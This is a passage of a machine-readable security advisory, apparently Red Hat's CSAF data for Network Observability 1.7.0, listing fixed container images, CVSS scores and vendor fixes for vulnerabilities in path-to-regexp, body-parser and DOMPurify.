"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "path-to-regexp: Backtracking regular expressions cause ReDoS"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
},
{
"cve": "CVE-2024-45801",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-16T19:20:09.863249+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2312631"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in DOMPurify. This issue may allow an attacker to use specially-crafted HTML to bypass the depth checking or use Prototype Pollution to weaken the depth check, which can lead to cross site scripting (XSS) attacks.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "dompurify: XSS vulnerability via prototype pollution",
"title": "Vulnerability summary"
},
{
"category": "other",
